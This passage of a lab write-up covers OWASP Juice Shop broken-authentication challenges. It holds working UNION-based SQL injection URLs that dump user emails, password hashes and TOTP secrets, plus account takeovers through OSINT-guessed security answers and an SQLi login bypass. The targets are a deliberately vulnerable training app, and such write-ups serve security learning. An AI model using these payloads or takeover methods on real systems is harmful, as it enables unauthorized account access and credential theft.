Professional Documents
Culture Documents
Broken Authentication Owasp
Broken Authentication Owasp
I entered "Samuel" as his brother's name. After submitting the request, I received a 200
response, indicating success, and thus, I was able to reset Jim's password.
Reset the password of Bjoern’s OWASP account via
the Forgot Password (Challenge 3)
I entered "bjoern@owasp.org" as his email and found his favorite pet's name, "Zaya," via a
Twitter post.
I provided "Zaya" as the answer to the security question, and this successfully allowed me to
reset Bjoern's OWASP account password.
Upon finding "chris.pike@juice-sh.op," I applied SQL injection for login bypass, successfully
solving this challenge.
I discovered that Bender had a job at the metalworking factory, and I learned about the
suicide booths.
Finally, I had a guess that the answer might be 'Stop'n'Drop' based on this information. I
entered it as the answer to the security question, and the challenge was solved."
I tried using this payload and it fails with no such column: 2fakey.
[http://localhost:3000/rest/products/search?
q=%27))%20union%20select%20null,id,email,password,2fa,null,null,null,null%20from%20us
ers--
I tried using this payload and it fails with no such column: 2fakey.
[http://localhost:3000/rest/products/search?
q=%27))%20union%20select%20null,id,email,password,2fakey,null,null,null,null%20from%2
0users--
Finally, I tried using this payload and succeeds with a 200 response as this column exists!
[http://localhost:3000/rest/products/search?
q=%27))%20union%20select%20null,id,email,password,totpsecret,null,null,null,null%20from
%20users--
Payload understanding
1. )) : This part suggests the closing of some previous SQL query or statement.
2. union select : combining the results of two SELECT queries into a single result set.
3. null,id,email,password,totpsecret,null,null,null,null : These are the
columns am selecting from the "users" table. Each "null" represents a placeholder for
the columns am not interested in.
4. from users : This specifies the table am going to retrieve.
5. --- : This might be a comment delimiter used to comment out the rest of the original
SQL query.
In the response from the successful SQL injection payload, I found the entry of user
wurstbrot@juice-sh.op with a secret key named
'IFTXE3SPOEYVURT2MRYGI52TKJ4HC3KH' for 2FA.